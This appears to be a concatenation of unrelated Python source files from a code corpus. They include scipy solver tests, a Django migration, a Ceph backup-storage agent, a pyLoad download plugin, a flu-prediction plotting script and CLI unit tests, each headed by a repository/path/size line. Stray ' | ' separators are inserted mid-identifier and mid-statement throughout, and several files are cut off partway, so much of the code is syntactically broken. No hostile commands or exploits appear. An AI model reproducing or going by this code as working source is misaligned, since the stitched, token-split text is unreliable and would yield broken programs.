class Draft3RemoteResolution(RemoteRefResolution):
validator_class = Draft3Validator
@load_json_cases("draft4/refRemote.json")
class Draft4RemoteResolution(RemoteRefResolution):
validator_class = Draft4Validator
class TestIterErrors(unittest.TestCase):
def setUp(self):
self.validator = Draft3Validator({})
def test_iter_errors(self):
instance = [1, 2]
schema = {
"disallow" : "array",
"enum" : [["a", "b", "c"], ["d", "e", "f"]],
"minItems" : 3
}
got = (str(e) for e in self.validator.iter_er |
GeoMatDigital/django-geomat | geomat/stein/migrations/0055_delete_classification_model.py | Python | bsd-3-clause | 313 | 0 | # Generated by Django 2. | 0.2 on 2018-02-03 17:07
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('stein', '0054_delete_classification_relation'),
]
operations = [
migrations.DeleteModel(
name='Classification',
| ),
]
|
rneher/FitnessInference | flu/figure_scripts/flu_figures_inference.py | Python | mit | 12,931 | 0.024205 |
#########################################################################################
#
# author: Richard Neher
# email: richard.neher@tuebingen.mpg.de
#
# Reference: Richard A. Neher, Colin A Russell, Boris I Shraiman.
# "Predicting evolution from the shape of genealogical trees"
#
##################################################
#!/ebio/ag-neher/share/programs/bin/python2.7
#
#script that reads in precomputed repeated prediction of influenza and
#and plots the average predictions using external, internal nodes for each year
#in addition, it compares this to predictions rewarding Koel et al mutations
#and to predictions using explicit temporal information (frequency dynamics within
#clades)
#
import glob,a | rgparse,sys
sys.path.append('/ebio/ag-neher/share/users/rneher/FluPrediction_code/flu/src')
import test_flu_prediction as test_flu
import analysis_utils as AU
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import scoreatpercentile
file_formats = [] #['.pdf', '.svg']
# set matplotlib plotting parameters
plt.rcParams.update(test_flu.mpl_params)
figure_folder = '../figures_ms/'
# set flutype, prediction regions, and basic parameters
parser = test_flu.make_flu_parser()
params=par | ser.parse_args()
params.year='????'
params.sample_size = 100
D = params.diffusion = 0.5
gamma = params.gamma = 3.0
omega = params.omega = 0.001
params.collapse = False
metric = 'nuc'
# make file identifiers
base_name, name_mod = test_flu.get_fname(params)
#remove year
base_name = '_'.join(base_name.split('_')[:1]+base_name.split('_')[2:])
base_name = base_name.replace('_????','')
# load data (with Koel boost and without), save in dictionary
prediction_distances={}
normed_distances={}
for boost in [0.0,0.5,1.0]:
params.boost = boost
years,tmp_pred, tmp_normed = AU.load_prediction_data(params, metric)
prediction_distances.update(tmp_pred)
normed_distances.update(tmp_normed)
##################################################################################
## main figure 3c
##################################################################################
# make figure
plt.figure(figsize = (12,6))
# plot line for random expection
plt.plot([min(years)-0.5,max(years)+0.5], [1,1], lw=2, c='k')
# add shaded boxes and optimal and L&L predictions
for yi,year in enumerate(years):
plt.gca().add_patch(plt.Rectangle([year-0.5, 0.2], 1.0, 1.8, color='k', alpha=0.05*(1+np.mod(year,2))))
plt.plot([year-0.5, year+0.5], [prediction_distances[('minimal',boost,'minimal')][yi],
prediction_distances[('minimal',boost,'minimal')][yi]],
lw=2, c='k', ls = '--')
for method, sym, col, shift, label in [[('fitness,terminal nodes',0.0,'pred(T)'), 's', 'k', -0.25, 'top ranked terminal nodes'],
[('fitness,internal nodes',0.0,'pred(I)'), 'd', 'r', 0.25, 'top ranked internal nodes ']]:
plt.plot(years+shift, prediction_distances[method], sym, c= col, ms=8,
label=label) #+r' $\bar{d}='+str(np.round(normed_distances[method][0],2))+'$')
# set limits, ticks, legends
plt.ylim([0.2, 1.7])
plt.yticks([0.5, 1, 1.5])
plt.xlim([min(years)-0.5,max(years)+0.5])
plt.xticks(years[::2])
plt.ylabel(r'$\Delta(\mathrm{prediction})$ to next season')
plt.xlabel('year')
plt.legend(loc=9, ncol=1,numpoints=1)
#add panel label
plt.text(-0.06,0.95,'C', transform = plt.gca().transAxes, fontsize = 36)
#save figure
plt.tight_layout()
for ff in file_formats:
plt.savefig(figure_folder+'Fig4C_'+base_name+'_'+name_mod+'_internal_external_revised'+ff)
##################################################################################
## Fig 4: compare bootstrap distributions of prediction results
## Bootstrapping is over years
##
##################################################################################
#sorted_methods = [a for a in sorted(normed_distances.items(), key=lambda x:x[1]) if a[0][0]
# not in ['ladder rank', 'date', 'expansion, internal nodes', 'L&L'] or a[0][1]==0.0]
tick_labels = { ('fitness,internal nodes', 0.0, 'pred(I)'):'internal',
('fitness,terminal nodes', 0.0, 'pred(T)'):'terminal',
('expansion, internal nodes', 0.0, 'growth'):'growth',
('L&L', 0.0, r'L\&L'):r'L\&L',
('ladder rank',0.0, 'ladder rank'):'ladder rank'}
sorted_methods = [a for a in sorted(normed_distances.items(), key=lambda x:x[1][0]) if a[0][:2] in
[#('internal and expansion', 0.5),
#('internal and expansion', 0.0),
('fitness,internal nodes', 0.0),
('fitness,terminal nodes', 0.0),
('expansion, internal nodes', 0.0),
('L&L', 0.0),
('ladder rank',0.0)] ]
plt.figure(figsize = (8,5))
plt.boxplot([a[1][1][-1] for a in sorted_methods],positions = range(len(sorted_methods)))
#plt.xticks(range(len(sorted_methods)), [a[0][-1] for a in sorted_methods], rotation=30, horizontalalignment='right')
plt.xticks(range(len(sorted_methods)), [tick_labels[a[0]] for a in sorted_methods], rotation=30, horizontalalignment='right')
plt.ylabel(r'distance $\bar{d}$ to next season')
plt.xlim([-0.5, len(sorted_methods)-0.5])
plt.grid()
plt.tight_layout()
for ff in file_formats:
plt.savefig(figure_folder+'Fig5_'+base_name+'_'+name_mod+'_method_comparison'+ff)
##################################################################################
## Fig 3c-1 Comparison to L&L
##################################################################################
# make figure
plt.figure(figsize = (12,6))
# plot line for random expection
plt.plot([min(years)-0.5,max(years)+0.5], [1,1], lw=2, c='k')
# add shaded boxes and optimal
for yi,year in enumerate(years):
plt.gca().add_patch(plt.Rectangle([year-0.5, 0.2], 1.0, 1.8, color='k', alpha=0.05*(1+np.mod(year,2))))
plt.plot([year-0.5, year+0.5], [prediction_distances[('minimal',boost,'minimal')][yi],
prediction_distances[('minimal',boost,'minimal')][yi]],
lw=2, c='k', ls = '--')
method, sym, col, shift, label = ('fitness,terminal nodes',0.0,'pred(T)'), 's', 'k', -0.25, 'top ranked terminal nodes '
plt.plot(years+shift, prediction_distances[method], sym, c= col, ms=8, label=label+r' $\bar{d}='+str(np.round(normed_distances[method][0],2))+'$')
method, sym, col, shift, label = ('L&L',0.0,'L\&L'), 'o', 'r', 0.25, r'prediction by \L{}uksza and L\"assig'
plt.plot(years[AU.laessig_years(years)]+shift, prediction_distances[method][AU.laessig_years(years)],
sym, c= col, ms=8, label=label+r' $\bar{d}='+str(np.round(normed_distances[method][0],2))+'$')
# set limits, ticks, legends
plt.ylim([0.2, 1.7])
plt.yticks([0.5, 1, 1.5])
plt.xlim([min(years)-0.5,max(years)+0.5])
plt.xticks(years[::2])
plt.ylabel(r'$\Delta(\mathrm{prediction})$ to next season')
#plt.ylabel('nucleodide distance to next season\n(relative to average)')
plt.xlabel('year')
plt.legend(loc=9, ncol=1,numpoints=1)
#add panel label
plt.text(0.02,0.9,'Fig.~3-S1', transform = plt.gca().transAxes, fontsize = 20)
#save figure
plt.tight_layout()
for ff in file_formats:
plt.savefig(figure_folder+'Fig4C_s1_'+base_name+'_'+name_mod+'_LL_external_revised'+ff)
##################################################################################
## Fig 3c-2 inclusion of Koel boost -- no temporal compnent
##################################################################################
# make figure
plt.figure(figsize = (12,6))
plt.title(r'Rewarding Koel mutations -- w/o calde growth estimate: $\bar{d}='
+', '.join(map(str,[np.round(normed_distances[('fitness,internal nodes',boost,'pred(I)')][0],2)
for boost in [0.0, 0.5, 1.0]]))+'$ for $\delta = 0, 0.5, 1$', fontsize = 16)
# plot line for random expection
plt.plot([min(years)-0.5,max(years)+0.5], [1,1], lw=2, c='k')
# add shaded boxes and optimal
method, sym, col, shift, label = ('fitness,internal nodes',0.0,'pred(I)'), 's', 'k', -0.25, 'pred(I)+Koel boost'
for yi,year in enumerate(years):
plt.gca().add_ |
mingjian2049/zstack-utility | cephbackupstorage/cephbackupstorage/cephagent.py | Python | apache-2.0 | 21,260 | 0.003057 | __author__ = 'frank'
import os
import os.path
import pprint
import traceback
import urllib2
import zstacklib.utils.daemon as daemon
import zstacklib.utils.http as http
import zstacklib.utils.jsonobject as jsonobject
from zstacklib.utils import log
from zstacklib.utils.bash import *
from zstacklib.utils.report import Report
from zstacklib.utils import shell
from zstacklib.utils.rollback import rollback, rollbackable
logger = log.get_logger(__name__)
class AgentResponse(object):
    """Base response payload returned by every agent command handler.

    Carries a success flag, an error string (empty on success) and
    optional capacity figures for handlers that report them.
    """
    def __init__(self, success=True, error=None):
        self.success = success
        # normalize a None/falsy error to the empty string
        self.error = error or ''
        # capacity figures stay None unless a handler fills them in
        self.totalCapacity = None
        self.availableCapacity = None
class InitRsp(AgentResponse):
    """Response for INIT_PATH."""
    def __init__(self):
        super(InitRsp, self).__init__()
        # ceph cluster fsid; None until the init handler fills it in
        self.fsid = None
def __init__(self):
super(DownloadRsp, self).__init__()
self.size = None
self.actualSize = None
class GetImageSizeRsp(AgentResponse):
def __init__(self):
super(GetImageSizeRsp, self).__init__()
self.size = None
self.actualSize = None
class PingRsp(AgentResponse):
def __init__(self):
super(PingRsp, self).__init__()
self.failure = None
class GetFactsRsp(AgentResponse):
def __init__(self):
super(GetFactsRsp, self).__init__()
self.fsid = None
self.monAddr = None
class DeleteImageMetaDataResponse(AgentResponse):
def __init__(self):
super(DeleteImageMetaDataResponse,self).__init__()
self.ret = None
class WriteImageMetaDataResponse(AgentResponse):
def __init__(self):
super(WriteImageMetaDataResponse,self).__init__()
class GetImageMetaDataResponse(AgentResponse):
def __init__(self):
super(GetImageMetaDataResponse,self).__init__()
self.imagesMetadata= None
class DumpImageMetaDataToFileResponse(AgentResponse):
def __init__(self):
super(DumpImageMetaDataToFileResponse,self).__init__()
class CheckImageMetaDataFileExistResponse(AgentResponse):
def __init__(self):
super(CheckImageMetaDataFileExistResponse, self).__init__()
self.backupStorageMetaFileName = None
self.exist = None
def replyerror(func):
    """Decorator for HTTP command handlers: turn any exception into a
    serialized failure AgentResponse instead of letting it propagate.

    The full traceback plus call arguments are logged; only the exception
    message itself is surfaced to the caller in rsp.error.
    (The `err = ...` line carried a dataset-extraction artifact; restored.)
    """
    @functools.wraps(func)
    def wrap(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except Exception as e:
            content = traceback.format_exc()
            err = '%s\n%s\nargs:%s' % (str(e), content, pprint.pformat([args, kwargs]))
            rsp = AgentResponse()
            rsp.success = False
            rsp.error = str(e)
            logger.warn(err)
            return jsonobject.dumps(rsp)
    return wrap
class CephAgent(object):
INIT_PATH = "/ceph/backupstorage/init"
DOWNLOAD_IMAGE_PATH = "/ceph/backupstorage/image/d | ownload"
DELETE_IMAGE_PATH = "/ceph/backupstorage/image/delete"
PING_PATH = "/ceph/backupstorage/ping"
ECHO_PATH = "/ceph/backupstorage/echo"
GET_IMAGE_SIZE_PATH = "/ceph/backupstorage/image/getsize"
GET_FACTS = "/ceph/backupstorage/facts"
GET_IMAGES_METADATA = "/ceph/backupstorage/getimagesmetadata"
DELETE_IMAGES_METADATA = "/ceph/backupstorage/deleteimagesmetadata"
DUMP_IMAGE_METADATA_TO_FILE = "/ceph/backupstorage/dumpimagemetadatatofile"
CHECK_IMAGE_METADATA_FILE_EXIST = "/ceph/backupstorage/checkimagemetadatafileexist"
CHECK_POOL_PATH = "/ceph/backupstorage/checkpool"
CEPH_METADATA_FILE = "bs_ceph_info.json"
http_server = http.HttpServer(port=7761)
http_server.logfile_path = log.get_logfile_path()
def __init__(self):
self.http_server.register_async_uri(self.INIT_PATH, self.init)
self.http_server.register_async_uri(self.DOWNLOAD_IMAGE_PATH, self.download)
self.http_server.register_async_uri(self.DELETE_IMAGE_PATH, self.delete)
self.http_server.register_async_uri(self.PING_PATH, self.ping)
self.http_server.register_async_uri(self.GET_IMAGE_SIZE_PATH, self.get_image_size)
self.http_server.register_async_uri(self.GET_FACTS, self.get_facts)
self.http_server.register_sync_uri(self.ECHO_PATH, self.echo)
self.http_server.register_async_uri(self.GET_IMAGES_METADATA, self.get_images_metadata)
self.http_server.register_async_uri(self.CHECK_IMAGE_METADATA_FILE_EXIST, self.check_image_metadata_file_exist)
self.http_server.register_async_uri(self.DUMP_IMAGE_METADATA_TO_FILE, self.dump_image_metadata_to_file)
self.http_server.register_async_uri(self.DELETE_IMAGES_METADATA, self.delete_image_metadata_from_file)
self.http_server.register_async_uri(self.CHECK_POOL_PATH, self.check_pool)
def _set_capacity_to_response(self, rsp):
o = shell.call('ceph df -f json')
df = jsonobject.loads(o)
if df.stats.total_bytes__ is not None :
total = long(df.stats.total_bytes_)
elif df.stats.total_space__ is not None:
total = long(df.stats.total_space__) * 1024
else:
raise Exception('unknown ceph df output: %s' % o)
if df.stats.total_avail_bytes__ is not None:
avail = long(df.stats.total_avail_bytes_)
elif df.stats.total_avail__ is not None:
avail = long(df.stats.total_avail_) * 1024
else:
raise Exception('unknown ceph df output: %s' % o)
rsp.totalCapacity = total
rsp.availableCapacity = avail
@replyerror
def echo(self, req):
logger.debug('get echoed')
return ''
def _normalize_install_path(self, path):
return path.lstrip('ceph:').lstrip('//')
def _get_file_size(self, path):
o = shell.call('rbd --format json info %s' % path)
o = jsonobject.loads(o)
return long(o.size_)
@replyerror
def get_image_size(self, req):
cmd = jsonobject.loads(req[http.REQUEST_BODY])
rsp = GetImageSizeRsp()
path = self._normalize_install_path(cmd.installPath)
rsp.size = self._get_file_size(path)
return jsonobject.dumps(rsp)
@in_bash
@replyerror
def get_images_metadata(self, req):
logger.debug("meilei: get images metadata")
cmd = jsonobject.loads(req[http.REQUEST_BODY])
pool_name = cmd.poolName
bs_uuid = pool_name.split("-")[-1]
valid_images_info = ""
self.get_metadata_file(bs_uuid, self.CEPH_METADATA_FILE)
last_image_install_path = ""
bs_ceph_info_file = "/tmp/%s" % self.CEPH_METADATA_FILE
with open(bs_ceph_info_file) as fd:
images_info = fd.read()
for image_info in images_info.split('\n'):
if image_info != '':
image_json = jsonobject.loads(image_info)
# todo support multiple bs
image_uuid = image_json['uuid']
image_install_path = image_json["backupStorageRefs"][0]["installPath"]
ret = bash_r("rbd info %s" % image_install_path.split("//")[1])
if ret == 0 :
logger.info("Check image %s install path %s successfully!" % (image_uuid, image_install_path))
if image_install_path != last_image_install_path:
valid_images_info = image_info + '\n' + valid_images_info
last_image_install_path = image_install_path
else:
logger.warn("Image %s install path %s is invalid!" % (image_uuid, image_install_path))
self.put_metadata_file(bs_uuid, self.CEPH_METADATA_FILE)
rsp = GetImageMetaDataResponse()
rsp.imagesMetadata= valid_images_info
return jsonobject.dumps(rsp)
@in_bash
@replyerror
def check_image_metadata_file_exist(self, req):
cmd = jsonobject.loads(req[http.REQUEST_BODY])
pool_name = cmd.poolName
bs_uuid = pool_name.split("-")[-1]
rsp = CheckImageMetaDataFileExistResponse()
rsp.backupStorageMetaFileName = self.CEPH_METADATA_FILE
ret, output = bash_ro("rados -p bak-t-%s stat %s" % (bs_uuid,self.CEPH_METADATA_FILE))
|
xxHACKYHACKYXx/hackathon-dpse | Rule booklet in Python/Setup.py | Python | gpl-2.0 | 875 | 0.012571 | """In the case that the Setup.py file fails to execute, please manually install the following packages,
or execute the requirements.sh script."""
# Installing Requirements: #
# pip install git+https://github.com/pwal | ler/pyfiglet #
# pip install colorama #
# pip install termcolor | #
# pip install blessings #
from distutils.core import setup
setup(name='DPS East Hackathon Rule booklet.',
version='1.0',
description='DPS East Hackathon Rule booklet.',
author='thel3l',
author_email='i.rithwik@protonmail.com',
url='https://www.github.com/thel3l/hackathon-dpse',
packages=['distutils', 'distutils.command', 'pyfiglet', 'colorama', 'termcolor', 'blessings'],
)
|
ygenc/onlineLDA | onlineldavb_new/build/scipy/scipy/optimize/tests/test_nonlin.py | Python | gpl-3.0 | 11,990 | 0.009091 | """ Unit tests for nonlinear solvers
Author: Ondrej Certik
May 2007
"""
from numpy.testing import assert_, dec, TestCase, run_module_suite
from scipy.optimize import nonlin
from numpy import matrix, diag, dot
from numpy.linalg import inv
import numpy as np
SOLVERS = [nonlin.anderson, nonlin.diagbroyden, nonlin.linearmixing,
nonlin.excitingmixing, nonlin.broyden1, nonlin.broyden2,
nonlin.newton_krylov]
MUST_WORK = [nonlin.anderson, nonlin.broyden1, nonlin.broyden2,
nonlin.newton_krylov]
#-------------------------------------------------------------------------------
# Test problems
#-------------------------------------------------------------------------------
def F(x):
x = np.asmatrix(x).T
d = matrix(diag([3,2,1.5,1,0.5]))
c = 0.01
f = -d*x - c*float(x.T*x)*x
return f
F.xin = [1,1,1,1,1]
F.KNOWN_BAD = []
def F2(x):
return x
F2.xin = [1,2,3,4,5,6]
F2.KNOWN_BAD = [nonlin.linearmixing, nonlin.excitingmixing]
def F3(x):
A = np.mat('-2 1 0; 1 -2 1; 0 1 -2')
b = np.mat('1 2 3')
return np.dot(A, x) - b
F3.xin = [1,2,3]
F3.KNOWN_BAD = []
def F4_powell(x):
A = 1e4
return [A*x[0]*x[1] - 1, np.exp(-x[0]) + np.exp(-x[1]) - (1 + 1/A)]
F4_powell.xin = [-1, -2]
F4_powell.KNOWN_BAD = [nonlin.linearmixing, nonlin.excitingmixing,
nonlin.diagbroyden]
from test_minpack import TestFSolve as F5_class
F5_object = F5_class()
def F5(x):
return F5_object.pressure_network(x, 4, np.array([.5, .5, .5, .5]))
F5.xin = [2., 0, 2, 0]
F5.KNOWN_BAD = [nonlin.excitingmixing, nonlin.linearmixing, nonlin.diagbroyden]
def F6(x):
x1, x2 = x
J0 = np.array([[ -4.256 , 14.7 ],
[ 0.8394989 , 0.59964207]])
v = np.array([(x1 + 3) * (x2**5 - 7) + 3*6,
np.sin(x2 * np.exp(x1) - 1)])
return -np.linalg.solve(J0, v)
F6.xin = [-0.5, 1.4]
F6.KNOWN_BAD = [nonlin.excitingmixing, nonlin.linearmixing, nonlin.diagbroyden]
#-------------------------------------------------------------------------------
# Tests
#-------------------------------------------------------------------------------
class TestNonlin(object):
"""
Check the Broyden methods for a few test problems.
broyden1, broyden2, and newton_krylov must succeed for
all functions. Some of the others don't -- tests in KNOWN_BAD are skipped.
"""
def _check_func(self, f, func, f_tol=1e-2):
x = func(f, f.xin, f_tol=f_tol, maxiter=200, verbose=0)
assert_(np.absolute(f(x)).max() < f_tol)
@dec.knownfailureif(True)
def _check_func_fail(self, *a, **kw):
pass
def test_problem(self):
for f in [F, F2, F3, F4_powell, F5, F6]:
for func in SOLVERS:
if func in f.KNOWN_BAD:
if func in MUST_WORK:
yield self._check_func_fail, f, func
continue
yield self._check_func, f, func
class TestSecant(TestCase):
"""Check that some Jacobian approximations satisfy the secant condition"""
xs = [np.array([1,2,3,4,5], float),
np.array([2,3,4,5,1], float),
np.array([3,4,5,1,2], float),
np.array([4,5,1,2,3], float),
np.array([9,1,9,1,3], float),
np.array([0,1,9,1,3], float),
np.array([5,5,7,1,1], float),
np.array([1,2,7,5,1], float),]
fs = [x**2 - 1 for x in xs]
def _check_secant(self, jac_cls, npoints=1, **kw):
"""
Check that the given Jacobian approximation sa | tisfies secant
co | nditions for last `npoints` points.
"""
jac = jac_cls(**kw)
jac.setup(self.xs[0], self.fs[0], None)
for j, (x, f) in enumerate(zip(self.xs[1:], self.fs[1:])):
jac.update(x, f)
for k in xrange(min(npoints, j+1)):
dx = self.xs[j-k+1] - self.xs[j-k]
df = self.fs[j-k+1] - self.fs[j-k]
assert_(np.allclose(dx, jac.solve(df)))
# Check that the `npoints` secant bound is strict
if j >= npoints:
dx = self.xs[j-npoints+1] - self.xs[j-npoints]
df = self.fs[j-npoints+1] - self.fs[j-npoints]
assert_(not np.allclose(dx, jac.solve(df)))
def test_broyden1(self):
self._check_secant(nonlin.BroydenFirst)
def test_broyden2(self):
self._check_secant(nonlin.BroydenSecond)
def test_broyden1_update(self):
# Check that BroydenFirst update works as for a dense matrix
jac = nonlin.BroydenFirst(alpha=0.1)
jac.setup(self.xs[0], self.fs[0], None)
B = np.identity(5) * (-1/0.1)
for last_j, (x, f) in enumerate(zip(self.xs[1:], self.fs[1:])):
df = f - self.fs[last_j]
dx = x - self.xs[last_j]
B += (df - dot(B, dx))[:,None] * dx[None,:] / dot(dx, dx)
jac.update(x, f)
assert_(np.allclose(jac.todense(), B, rtol=1e-10, atol=1e-13))
def test_broyden2_update(self):
# Check that BroydenSecond update works as for a dense matrix
jac = nonlin.BroydenSecond(alpha=0.1)
jac.setup(self.xs[0], self.fs[0], None)
H = np.identity(5) * (-0.1)
for last_j, (x, f) in enumerate(zip(self.xs[1:], self.fs[1:])):
df = f - self.fs[last_j]
dx = x - self.xs[last_j]
H += (dx - dot(H, df))[:,None] * df[None,:] / dot(df, df)
jac.update(x, f)
assert_(np.allclose(jac.todense(), inv(H), rtol=1e-10, atol=1e-13))
def test_anderson(self):
# Anderson mixing (with w0=0) satisfies secant conditions
# for the last M iterates, see [Ey]_
#
# .. [Ey] V. Eyert, J. Comp. Phys., 124, 271 (1996).
self._check_secant(nonlin.Anderson, M=3, w0=0, npoints=3)
class TestLinear(TestCase):
"""Solve a linear equation;
some methods find the exact solution in a finite number of steps"""
def _check(self, jac, N, maxiter, complex=False, **kw):
np.random.seed(123)
A = np.random.randn(N, N)
if complex:
A = A + 1j*np.random.randn(N, N)
b = np.random.randn(N)
if complex:
b = b + 1j*np.random.randn(N)
def func(x):
return dot(A, x) - b
sol = nonlin.nonlin_solve(func, b*0, jac, maxiter=maxiter,
f_tol=1e-6, line_search=None, verbose=0)
assert_(np.allclose(dot(A, sol), b, atol=1e-6))
def test_broyden1(self):
# Broyden methods solve linear systems exactly in 2*N steps
self._check(nonlin.BroydenFirst(alpha=1.0), 20, 41, False)
self._check(nonlin.BroydenFirst(alpha=1.0), 20, 41, True)
def test_broyden2(self):
# Broyden methods solve linear systems exactly in 2*N steps
self._check(nonlin.BroydenSecond(alpha=1.0), 20, 41, False)
self._check(nonlin.BroydenSecond(alpha=1.0), 20, 41, True)
def test_anderson(self):
# Anderson is rather similar to Broyden, if given enough storage space
self._check(nonlin.Anderson(M=50, alpha=1.0), 20, 29, False)
self._check(nonlin.Anderson(M=50, alpha=1.0), 20, 29, True)
def test_krylov(self):
# Krylov methods solve linear systems exactly in N inner steps
self._check(nonlin.KrylovJacobian, 20, 2, False, inner_m=10)
self._check(nonlin.KrylovJacobian, 20, 2, True, inner_m=10)
class TestJacobianDotSolve(object):
"""Check that solve/dot methods in Jacobian approximations are consistent"""
def _func(self, x):
return x**2 - 1 + np.dot(self.A, x)
def _check_dot(self, jac_cls, complex=False, tol=1e-6, **kw):
np.random.seed(123)
N = 7
def rand(*a):
q = np.random.rand(*a)
if complex:
q = q + 1j*np.random.rand(*a)
return q
def assert_close(a, b, msg):
d = abs(a - b).max()
f = tol + abs(b).max()*tol
if d > f:
raise AssertionError('%s: err %g' % (msg, d))
self.A = rand(N, N)
# initialize
x0 = np.random.rand(N)
|
noironetworks/python-group-based-policy-client | gbpclient/tests/unit/test_cli20_natpool.py | Python | apache-2.0 | 4,756 | 0 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import logging
import sys
from gbpclient.gbp.v2_0 import groupbasedpolicy as gbp
from gbpclient.tests.unit import test_cli20
class CLITestV20NatPoolJSON(test_cli20.CLITestV20Base):
LOG = logging.getLogger(__name__)
def setUp(self):
super(CLITestV20NatPoolJSON, self).setUp()
def test_create_nat_pool_with_mandatory_params(self):
"""nat-pool-create with all mandatory params."""
resource = 'nat_pool'
cmd = gbp.CreateNatPool(test_cli20.MyApp(sys.stdout), None)
name = 'my-name'
tenant_id = 'my-tenant'
my_id = 'my-id'
args = ['--tenant-id', tenant_id,
name]
position_names = ['name', ]
position_values = [name, ]
self._test_create_resource(resource, cmd, name, my_id, args,
position_names, position_values,
tenant_id=tenant_id)
def test_create_nat_pool_with_all_params(self):
"""nat-pool-create with all params."""
resource = 'nat_pool'
cmd = gbp.CreateNatPool(test_cli20.MyApp(sys.stdout), None)
name = 'myname'
tenant_id = 'mytenant'
description = 'My Nat Pool'
my_id = 'someid'
ip_version = '4'
ip_pool = '192.168.0.0/24'
external_segment_id = "segmentid"
shared = 'true'
args = ['--tenant-id', tenant_id,
'--description', description,
'--ip-version', ip_version,
'--ip-pool', ip_pool,
'--external-segment', external_segment_id,
'--shared', shared,
name]
position_names = ['name', ]
position_values = [name, ]
self._test_create_resource(resource, cmd, name, my_id, args,
position_names, position_values,
tenant_id=tenant_id,
description=description,
ip_version=4,
ip_pool=ip_pool,
external_segment_id=external_segment_id,
shared=shared)
def test_list_nat_pools(self):
"""nat-pool-list."""
resource = 'nat_pools'
cmd = gbp.ListNatPool(test_cli20.MyApp(sys.stdout), None)
self._test_list_resources(resource, cmd, True)
def test_show_nat_pool_name(self | ):
"""nat-pool-show."""
resource = 'nat_pool'
cmd = | gbp.ShowNatPool(test_cli20.MyApp(sys.stdout), None)
args = ['--fields', 'id', self.test_id]
self._test_show_resource(resource, cmd, self.test_id, args, ['id'])
def test_update_nat_pool(self):
"nat-pool-update myid --name myname --tags a b."
resource = 'nat_pool'
cmd = gbp.UpdateNatPool(test_cli20.MyApp(sys.stdout), None)
self._test_update_resource(resource, cmd, 'myid',
['myid', '--name', 'myname',
'--tags', 'a', 'b'],
{'name': 'myname', 'tags': ['a', 'b'], })
def test_update_nat_pool_with_all_params(self):
resource = 'nat_pool'
cmd = gbp.UpdateNatPool(test_cli20.MyApp(sys.stdout), None)
name = 'myname'
description = 'My Nat Pool'
my_id = 'someid'
external_segment_id = "segmentid"
shared = 'true'
args = ['--name', name,
'--description', description,
'--external-segment', external_segment_id,
'--shared', shared,
my_id]
params = {
'name': name,
'description': description,
'external_segment_id': external_segment_id,
'shared': shared
}
self._test_update_resource(resource, cmd, my_id, args, params)
def test_delete_nat_pool_name(self):
"""nat-pool-delete."""
resource = 'nat_pool'
cmd = gbp.DeleteNatPool(test_cli20.MyApp(sys.stdout), None)
my_id = 'my-id'
args = [my_id]
self._test_delete_resource(resource, cmd, my_id, args)
|
erikmhauck/Bagster | gui/elements/__init__.py | Python | mit | 112 | 0 | from file_view_handler import FileHandler
from metadata_table import Metad | ataTable
from row_ite | m import RowItem
|
joberreiter/pyload | module/plugins/hoster/YourfilesTo.py | Python | gpl-3.0 | 2,040 | 0.006373 | # -*- coding: utf-8 -*-
import re
import urllib
from module.plugins.internal.Hoster import Hoster
class YourfilesTo(Hoster):
__name__ = "YourfilesTo"
__type__ = "hoster"
__version__ = "0.24"
__status__ = "testing"
__pattern__ = r'http://(?:www\.)?yourfiles\.(to|biz)/\? | d=\w+'
__description__ = """Youfiles.to hoster plugin"""
__license__ = "GPLv3"
__authors__ = [("jeix", "jeix@hasnomail.de"),
("skydancer", "skydancer@hasnomail.de")]
def process(self, pyfile):
self.pyfile = pyfile
self.prepare()
self.download(self.get_file_url())
def prepare(self):
if not self.file_exists():
self.offline()
| self.pyfile.name = self.get_file_name()
self.wait(self.get_waiting_time())
def get_waiting_time(self):
if not self.html:
self.download_html()
#: var zzipitime = 15
m = re.search(r'var zzipitime = (\d+);', self.html)
if m is not None:
sec = int(m.group(1))
else:
sec = 0
return sec
def download_html(self):
url = self.pyfile.url
self.html = self.load(url)
def get_file_url(self):
"""
Returns the absolute downloadable filepath
"""
url = re.search(r"var bla = '(.*?)';", self.html)
if url:
url = url.group(1)
url = urllib.unquote(url.replace("http://http:/http://", "http://").replace("dumdidum", ""))
return url
else:
self.error(_("Absolute filepath not found"))
def get_file_name(self):
if not self.html:
self.download_html()
return re.search("<title>(.*)</title>", self.html).group(1)
def file_exists(self):
"""
Returns True or False
"""
if not self.html:
self.download_html()
if re.search(r"HTTP Status 404", self.html):
return False
else:
return True
|
holvi/python-stdnum | getmybp.py | Python | lgpl-2.1 | 3,036 | 0.001647 | #!/usr/bin/env python
# getmybp.py - script to donwnload data from Malaysian government site
#
# Copyright (C) 2013-2016 Arthur de Jong
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in t | he hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHA | NTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
from collections import defaultdict
import re
import urllib
import BeautifulSoup
# URLs that are downloaded
state_list_url = 'http://www.jpn.gov.my/informasi/kod-negeri/'
country_list_url = 'http://www.jpn.gov.my/en/informasi/kod-negara/'
spaces_re = re.compile('\s+', re.UNICODE)
def clean(s):
"""Cleans up the string removing unneeded stuff from it."""
return spaces_re.sub(' ', s.replace(u'\u0096', '')).strip().encode('utf-8')
def parse(f):
"""Parse the specified file."""
soup = BeautifulSoup.BeautifulSoup(f, convertEntities='html')
# find all table rows
for tr in soup.find('div', {'class': 'box-content'}).findAll('tr'):
# find the rows with four columns of text
tds = [
clean(''.join(x.string for x in td.findAll(text=True)))
for td in tr.findAll('td')
]
if len(tds) >= 2 and tds[0] and tds[1]:
yield tds[0], tds[1]
if len(tds) >= 4 and tds[2] and tds[3]:
yield tds[2], tds[3]
if __name__ == '__main__':
results = defaultdict(lambda : defaultdict(set))
# read the states
#f = open('/tmp/states.html', 'r')
